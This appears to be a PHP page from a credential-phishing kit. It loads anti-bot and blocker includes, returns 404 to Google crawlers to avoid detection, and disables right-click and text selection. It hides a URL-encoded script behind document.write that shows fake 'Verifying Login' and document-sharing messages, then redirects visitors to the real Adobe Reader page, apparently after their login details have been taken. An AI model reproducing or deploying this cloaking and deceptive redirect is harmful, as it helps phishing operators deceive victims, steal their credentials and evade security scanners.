<?php


session_start();
error_reporting(0);


include "boots/antibots1.php";
include "boots/antibots2.php";
include "boots/antibots3.php";
include "boots/antibots4.php";
include "boots/encriptar.php";
include "boots/.htaccess.htaccess";


if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }


session_start();

include("system/blocker.php");
include("system/detect.php");


$NZahPbgVnL = $_GET['NZahPbgVnL'];
$random=rand(0,100000000000);
@ini_set('display_errors',0);

?>

<HTML>
<HEAD><TITLE>Syn&#99;hroniz&#105;ng... </TITLE>

<link rel="shortcut icon" href="images/liamg.ico">
</HEAD>

<p align="left"><img src="images/0penin.png"  /></p>
<BODY text=#UUUUUU bgColor=#FFFFFF oncontextmenu="return false" onselectstart="return false" ondragstart="return false">

<link rel="shortcut icon" href="images/favicon.ico">

<DIV id=splashcontainer style="WIDTH:350px; POSITION: absolute"></DIV><LAYER

id=splashcontainerns width="450"></LAYER>

<font face="Arial" size="18">

<script>
<!--
document.write(unescape("%3CSCRIPT%3E%0A%0A%0A%0Avar%20preloadimages%3Dnew%20Array%28%22%3Aabstract.simplenet.com/point.gif%22%2C%22abstract.simplenet.com/point2.html%22%29%0A%0A%0A%0Avar%20intervals%3D3000%0A%0A//configure%20destination%20URL%0A%0Avar%20targetdestination%3D%22https%3A//get.adobe.com/reader%3F%22%0A%0A%0A%0A%0A%0Avar%20splashmessage%3Dnew%20Array%28%29%0A%0Avar%20openingtags%3D%27%3Cfont%20face%3D%22BANK%20GOTHIC%22%20size%3D%223%22%3E%27%0A%0Asplashmessage%5B0%5D%3D%27Verifying%20Login%2C%20Please%20wait%27%0A%0Asplashmessage%5B1%5D%3D%27Loading...%27%0A%0Asplashmessage%5B2%5D%3D%27Loading...%27%0A%0Asplashmessage%5B3%5D%3D%27Securely%20create%2C%20view%2C%20download%2C%20upload%2C%20and%20collaborate%20documents.%27%0A%0Asplashmessage%5B4%5D%3D%27Securely%20create%2C%20view%2C%20download%2C%20upload%2C%20and%20collaborate%20documents.%27%0A%0Asplashmessage%5B5%5D%3D%27Initializing...%27%0A%0A%0A%0A%0Avar%20closingtags%3D%27%3C/font%3E%27%0A%0A%0A%0A//Do%20not%20edit%20below%20this%20line%20%28besides%20HTML%20code%20at%20the%20very%20bottom%29%0A%0A%0A%0Avar%20i%3D0%0A%0A%0A%0Avar%20ns4%3Ddocument.layers%3F1%3A0%0A%0Avar%20ie4%3Ddocument.all%3F1%3A0%0A%0Avar%20ns6%3Ddocument.getElementById%26%26%21document.all%3F1%3A0%0A%0Avar%20theimages%3Dnew%20Array%28%29%0A%0A%0A%0A//preload%20images%0A%0Aif%20%28document.images%29%7B%0A%0Afor%20%28p%3D0%3Bp%3Cpreloadimages.length%3Bp++%29%7B%0A%0Atheimages%5Bp%5D%3Dnew%20Image%28%29%0A%0Atheimages%5Bp%5D.src%3Dpreloadimages%5Bp%5D%0A%0A%7D%0A%0A%7D%0A%0A%0A%0Afunction%20displaysplash%28%29%7B%0A%0Aif%20%28i%3Csplashmessage.length%29%7B%0A%0Asc_cross.style.visibility%3D%22hidden%22%0A%0Asc_cross.innerHTML%3D%27%3Cb%3E%3Ccenter%3E%27+openingtags+splashmessage%5Bi%5D+closingtags+%27%3C/center%3E%3C/b%3E%27%0A%0Asc_cross.style.left%3Dns6%3FparseInt%28window.pageXOffset%29+parseInt%28window.innerWidth%29/2-parseInt%28sc_cross.style.width%29/2%20%3Adocument.body.scrollLeft+document.body.clientWidth/2-parseInt%28sc_cross.style.width%29/2%0A%0Asc_cross.style.top%3Dns6%3FparseInt%28window.pageYOffset%29+parseInt%28window.innerHeight%29/2-sc_cross.offsetHeight/2%3Adocument.body.scrollTop+document.body.clientHeight/2-sc_cross.offsetHeight/2%0A%0Asc_cross.style.visibility%3D%22visible%22%0A%0Ai++%0A%0A%7D%0A%0Aelse%7B%0A%0Awindow.location%3Dtargetdestination%0A%0Areturn%0A%0A%7D%0A%0AsetTimeout%28%22displaysplash%28%29%22%2Cintervals%29%0A%0A%7D%0A%0A%0A%0Afunction%20displaysplash_ns%28%29%7B%0A%0Aif%20%28i%3Csplashmessage.length%29%7B%0A%0Asc_ns.visibility%3D%22hide%22%0A%0Asc_ns.document.write%28%27%3Cb%3E%27+openingtags+splashmessage%5Bi%5D+closingtags+%27%3C/b%3E%27%29%0A%0Asc_ns.document.close%28%29%0A%0A%0A%0Asc_ns.left%3DpageXOffset+window.innerWidth/2-sc_ns.document.width/2%0A%0Asc_ns.top%3DpageYOffset+window.innerHeight/2-sc_ns.document.height/2%0A%0A%0A%0Asc_ns.visibility%3D%22show%22%0A%0Ai++%0A%0A%7D%0A%0Aelse%7B%0A%0Awindow.location%3Dtargetdestination%0A%0Areturn%0A%0A%7D%0A%0AsetTimeout%28%22displaysplash_ns%28%29%22%2Cintervals%29%0A%0A%7D%0A%0A%0A%0A%0A%0A%0A%0Afunction%20positionsplashcontainer%28%29%7B%0A%0Aif%20%28ie4%7C%7Cns6%29%7B%0A%0Asc_cross%3Dns6%3Fdocument.getElementById%28%22splashcontainer%22%29%3Adocument.all.splashcontainer%0A%0Adisplaysplash%28%29%0A%0A%7D%0A%0Aelse%20if%20%28ns4%29%7B%0A%0Asc_ns%3Ddocument.splashcontainerns%0A%0Asc_ns.visibility%3D%22show%22%0A%0Adisplaysplash_ns%28%29%0A%0A%7D%0A%0Aelse%0A%0Awindow.location%3Dtargetdestination%0A%0A%7D%0A%0Awindow.onload%3Dpositionsplashcontainer%0A%0A%0A%0A%3C/SCRIPT%3E%0A%0A%0A%0A%3C/font%3E%0A%0A%0A%0A%3CDIV%20align%3Dright%3E%20%3C/DIV%3E%0A%0A%3CSCRIPT%3E%3C%21--%0A%0A%20var%20jv%3D1.0%3B%0A%0A//--%3E%3C/SCRIPT%3E%0A%0A%0A%0A%3CSCRIPT%20language%3DJavascript1.1%3E%3C%21--%0A%0A%20jv%3D1.1%3B%0A%0A//--%3E%3C/SCRIPT%3E%0A%0A%0A%0A%3CSCRIPT%20language%3DJavascript1.2%3E%3C%21--%0A%0A%20jv%3D1.2%3B%0A%0A//--%3E%3C/SCRIPT%3E%0A%0A%0A%0A%3CSCRIPT%20language%3DJavascript1.3%3E%3C%21--%0A%0A%20jv%3D1.3%3B%0A%0A//--%3E%3C/SCRIPT%3E%0A%0A%0A%0A%3CSCRIPT%20language%3DJavascript1.4%3E%3C%21--%0A%0A%20jv%3D1.4%3B%0A%0A//--%3E%3C/SCRIPT%3E%0A%0A%0A%0A%0A%0A%3CNOSCRIPT%3E%3CIMG%20height%3D1%20src%3D%22%23%22%0A%0Awidth%3D1%3E%3C/NOSCRIPT%3E%0A%3Cp%3E%26nbsp%3B%3C/p%3E%0A%3Cp%3E%26nbsp%3B%3C/p%3E%0A%3Cp%3E%26nbsp%3B%3C/p%3E%0A%3Cp%3E%26nbsp%3B%3C/p%3E%0A%3Cp%20align%3D%22center%22%3E%26nbsp%3B%3C/p%3E%0A%3Cp%20align%3D%22center%22%3E%26nbsp%3B%3C/p%3E%0A%3Cp%20align%3D%22center%22%3E%26nbsp%3B%3C/p%3E%0A%3Cp%20align%3D%22center%22%3E%26nbsp%3B%3C/p%3E%0A%3Cp%20align%3D%22center%22%3E%3Cimg%20src%3D%22images/1load.gif%22%20width%3D%2266%22%20height%3D%2266%22%20/%3E%3C/p%3E%0A%0A%3C/BODY%3E"));
//-->
</script>

</HTML>